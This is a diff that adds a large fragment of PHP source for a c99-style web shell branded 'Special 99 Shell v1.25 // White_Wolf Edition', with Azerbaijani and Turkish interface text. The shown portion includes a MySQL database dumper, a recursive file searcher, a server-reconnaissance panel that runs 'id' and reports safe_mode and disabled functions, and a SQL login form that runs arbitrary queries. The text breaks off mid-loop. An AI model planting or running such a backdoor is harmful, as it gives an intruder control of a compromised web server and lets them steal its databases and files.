+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+ return $type.join("",$owner).join("",$group).join("",$world);
+}
+}
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+if (!function_exists("parse_perms"))
+{
+function parse_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$t = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+ else {$t = "?";}
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+}
+if (!function_exists("parsesort"))
+{
+function parsesort($sort)
+{
+ $one = intval($sort);
+ $second = substr($sort,-1);
+ if ($second != "d") {$second = "a";}
+ return array($one,$second);
+}
+}
+if (!function_exists("view_perms_color"))
+{
+function view_perms_color($o)
+{
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+}
+if (!function_exists("mysql_dump")){
+function mysql_dump($set)
+{
+ global $shver;
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ $ret["err"] = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = 0;}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (empty($file))
+ {
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (sizeof($tabs) == 0)
+ {
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ $out = "# Dumped by ".$shver."
+# Home page: http://www.g3n3t1x.org
+#
+# Host Ayarlari:
+# MySQL Versiyon: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+# Tarih: ".date("d.m.Y H:i:s")."
+# Veritabani: \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+   
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret["err"][] = mysql_smarterror();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row["1"].";\n\n";
+    
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+      $values = implode("', '", $values);
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+      $out .= $sql;
+     }
+    }
+   }
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w");
+  if (!$fp) {$ret["err"][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $out;
+}
+}
+if (!function_exists("mysql_buildwhere"))
+{
+function mysql_buildwhere($array,$sep=" and",$functs=array())
+{
+ if (!is_array($array)) {$array = array();}
+ $result = "";
+ foreach($array as $k=>$v)
+ {
+  $value = "";
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+  $value .= "'".addslashes($v)."'";
+  if (!empty($functs[$k])) {$value .= ")";}
+  $result .= "`".$k."` = ".$value.$sep;
+ }
+ $result = substr($result,0,strlen($result)-strlen($sep));
+ return $result;
+}
+}
+if (!function_exists("mysql_fetch_all"))
+{
+function mysql_fetch_all($query,$sock)
+{
+ if ($sock) {$result = mysql_query($query,$sock);}
+ else {$result = mysql_query($query);}
+ $array = array();
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+ mysql_free_result($result);
+ return $array;
+}
+}
+if (!function_exists("mysql_smarterror"))
+{
+function mysql_smarterror($type,$sock)
+{
+ if ($sock) {$error = mysql_error($sock);}
+ else {$error = mysql_error();}
+ $error = htmlspecialchars($error);
+ return $error;
+}
+}
+if (!function_exists("mysql_query_form"))
+{
+function mysql_query_form()
+{
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act))
+ {
+  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
+  if ($tbl_struct)
+  {
+   echo "<td valign=\"top\"><b>Fields:</b><br>";
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "� <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+   echo "</td></tr></table>";
+  }
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+}
+}
+if (!function_exists("mysql_create_db"))
+{
+function mysql_create_db($db,$sock="")
+{
+ $sql = "CREATE DATABASE `".addslashes($db)."`;";
+ if ($sock) {return mysql_query($sql,$sock);}
+ else {return mysql_query($sql);}
+}
+}
+if (!function_exists("mysql_query_parse"))
+{
+function mysql_query_parse($query)
+{
+ $query = trim($query);
+ $arr = explode (" ",$query);
+ /*array array()
+ {
+  "METHOD"=>array(output_type),
+  "METHOD1"...
+  ...
+ }
+ if output_type == 0, no output,
+ if output_type == 1, no output if no error
+ if output_type == 2, output without control-buttons
+ if output_type == 3, output with control-buttons
+ */
+ $types = array(
+  "SELECT"=>array(3,1),
+  "SHOW"=>array(2,1),
+  "DELETE"=>array(1),
+  "DROP"=>array(1)
+ );
+ $result = array();
+ $op = strtoupper($arr[0]);
+ if (is_array($types[$op]))
+ {
+  $result["propertions"] = $types[$op];
+  $result["query"]  = $query;
+  if ($types[$op] == 2)
+  {
+   foreach($arr as $k=>$v)
+   {
+    if (strtoupper($v) == "LIMIT")
+    {
+     $result["limit"] = $arr[$k+1];
+     $result["limit"] = explode(",",$result["limit"]);
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+     unset($arr[$k],$arr[$k+1]);
+    }
+   }
+  }
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $search_i_f;
+ global $search_i_d;
+ global $a;
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($f = readdir($h)) !== FALSE)
+ {
+  if($f != "." && $f != "..")
+  {
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+   if (is_dir($d.$f))
+   {
+    $search_i_d++;
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+    if (!is_link($d.$f)) {c99fsearch($d.$f);}
+   }
+   else
+   {
+    $search_i_f++;
+    if ($bool)
+    {
+     if (!empty($a["text"]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+      else {$bool = strpos(" ".$r,$a["text"],1);}
+      if ($a["text_not"]) {$bool = !$bool;}
+      if ($bool) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+ }
+ closedir($h);
+}
+}
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
+//Sending headers
+@ob_start();
+@ob_implicit_flush(0);
+function onphpshutdown()
+{
+ global $gzipencode,$ft;
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
+ {
+  $v = @ob_get_contents();
+  @ob_end_clean();
+  @ob_start("ob_gzHandler");
+  echo $v;
+  @ob_end_flush();
+ }
+}
+function c99shexit()
+{
+ onphpshutdown();
+ exit;
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", FALSE);
+header("Pragma: no-cache");
+if (empty($tmpdir))
+{
+ $tmpdir = ini_get("upload_tmp_dir");
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+}
+$tmpdir = realpath($tmpdir);
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+else {$tmpdir_logs = realpath($tmpdir_logs);}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = TRUE;
+ $hsafemode = "<font color=green>&#304;&#351;l&#601;yir</font>";
+}
+else {$safemode = FALSE; $hsafemode = "<font color=red>&#304;&#351;l&#601;mir</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=red>&#304;&#351;l&#601;mir</font>";}
+$sort = htmlspecialchars($sort);
+if (empty($sort)) {$sort = $sort_default;}
+$sort[1] = strtolower($sort[1]);
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+@ini_set("highlight.bg",$highlight_bg); 
+@ini_set("highlight.comment",$highlight_comment); 
+@ini_set("highlight.default",$highlight_default); 
+@ini_set("highlight.html",$highlight_html); 
+@ini_set("highlight.keyword",$highlight_keyword); 
+@ini_set("highlight.string",$highlight_string); 
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?>
+
+<html><head>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title>
+Special 99 Shell v1.25 // White_Wolf Edition</title><STYLE>
+TD { FONT-SIZE: 16pt; COLOR: #ebebeb; FONT-FAMILY: tahoma;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: tahoma;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: tahoma;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: tahoma; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: tahoma; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:tahoma; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: tahoma,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: tahoma; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}
+.style1 {
+	color: #FF0000;
+	font-weight: bold;
+}
+.style2 {font-size: -3}
+</style>
+</head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>
+<div align="right"><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#330000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2">
+	<p><font face="Tahoma"> <img src=http://caspian-pirates.org/once-vatan/logo.png></font></p>
+	<p><font face="Tahoma" size="3">&nbsp;&nbsp;&nbsp;Developing by &#3628;&#1106;&#3648;t&#1108;_&#3628;&#3663;l&#358;</font></p>
+			</p></th></tr><tr><td><p align="left"><b>
+		<font face="Tahoma" size="1">Sistem</font></b><font face='Tahoma' size='1'><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>
+			Sistem Melumatlari&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><? echo "<b>B.Fonksiy0nlar&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:</b><b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=red> yox</font></b>";}else{echo "<font color=green>$df</font></b>";} ?><p align="left">
+		<b>Grup&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: <?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?><?php $curl_on = @function_exists('curl_version');
+echo "<br/>cURL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: <b>".(($curl_on)?("<font color=green>&#304;&#351;l&#601;yir</font>"):("<font color=red>&#304;&#351;l&#601;mir</font>")); ?></br><? if(@ini_get("register_globals")){$reg_g="<font color=green>&#304;&#351;l&#601;yir</font>";}else{$reg_g="<font color=red>&#304;&#351;l&#601;mir</font>";} echo("<b>Global Kayit&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:</b> $reg_g"); ?><?php echo "<br/>MySQL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>&#304;&#351;l&#601;yir</font>"; } else { echo "<font color=red>&#304;&#351;l&#601;mir</font>"; }
+echo "</b>";
+echo "<br/>MSSQL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>&#304;&#351;l&#601;yir</font>";}else{echo "<font color=red>&#304;&#351;l&#601;mir</font>";} ?><?php echo "<br/>PostgreSQL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>&#304;&#351;l&#601;yir</font>";}else{echo "<font color=red>&#304;&#351;l&#601;mir</font>";} ?><?php echo "<br/>Oracle&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>&#304;&#351;l&#601;yir</font>";}else{echo "<font color=red>&#304;&#351;l&#601;mir</font>";} ?> 
+		</b>&nbsp;</p><p align="left"><b>Qorunma&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;<?php echo $hsafemode; ?></b></p>
+			<p align="left">&nbsp;</p></font><font face='Tahoma' size='2'><p><a href="http://caspian-pirates.org/whois.php">
+			<font face="Tahoma">Serverdeki Saytlarin Siyahisi</font></a></p>
+  			</font><font face='Tahoma' size='1'><p align="left"><?php
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+$d = str_replace("\\\\","\\",$d);
+$dispd = htmlspecialchars($d);
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r.DIRECTORY_SEPARATOR;
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = TRUE;
+ $wdt = "<font color=green>[ Ok! ]</font>";
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = FALSE;
+ $wdt = "<font color=red>[ Sadece Okunabilir! ]</font>";
+ echo "<b>".view_perms_color($d)."</b>";
+}
+if (is_callable("disk_free_space"))
+{
+ $free = disk_free_space($d);
+ $total = disk_total_space($d);
+ if ($free === FALSE) {$free = 0;}
+ if ($total === FALSE) {$total = 0;}
+ if ($free < 0) {$free = 0;}
+ if ($total < 0) {$total = 0;}
+ $used = $total-$free;
+ $free_percent = round(100/($total/$free),2);
+
+}
+$letters = "";
+if ($win)
+{
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach (range("a","z") as $letter)
+ {
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+  if (!$bool) {$bool = is_dir($letter.":\\");}
+  if ($bool)
+  {
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
+   if ($letter.":" != $v) {$letters .= $letter;}
+   else {$letters .= "<font color=green>".$letter."</font>";}
+   $letters .= " ]</a> ";
+  }
+ }
+ if (!empty($letters)) {}
+}
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%sort",$sort,$item[1]);
+  $v = realpath($d."..");
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+echo "</p></td></tr></table><br>";
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#330000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#330000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#330000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center>
+			<font face="Tahoma"><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_smarterror();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+ }
+ else {$sql_sock = FALSE;}
+ echo "<b>SQL Baglanti Sihirbazi:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "Su anda baglanti y0k!";}
+  else {echo "<center><b>Baglanti yapilamiy0r!</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?></font><td width="28%" height="100" valign="top"><center>
+			<font size="5" face="Tahoma"><br/></font></center><li>
+			<font face="Tahoma">Database istifad&#601;&ccedil;i ad&#305; v&#601; &#351;ifr&#601;sini yaz&#305;n</font><li>
+			<font face="Tahoma">Databasa &#351;ifr&#601;sini v&#601; ad&#305;n&#305; yaz&#305;n</font><li>
+			<font face="Tahoma">Port N&ouml;mr&#601;si il&#601; oynamay&#305;n</font></td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>
+					&nbsp;<table><tr><td>
+				<font face="Tahoma"><b>Db istifad&#601;&ccedil;i Ad&#305;</b></font></td><td>
+				<font face="Tahoma"><b>DB Sifr&#601;si</b>&nbsp;</font></td><td>
+				<font face="Tahoma"><b>Database Adi</b>&nbsp;</font></td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td>
+					<b><font face="Tahoma">Server adl</font></b></td><td>
+					<font face="Tahoma"><b>Port No</b></font></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Baglan!"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+  //SoL panel basladi!
+  if (!empty($sql_db))
+  {
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."w4/act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>
+				<font face="Tahoma">Home</font></b></a><hr size="1" noshade>
+				<font face="Tahoma"><?php
+   $result = mysql_list_tables($sql_db);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>�&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
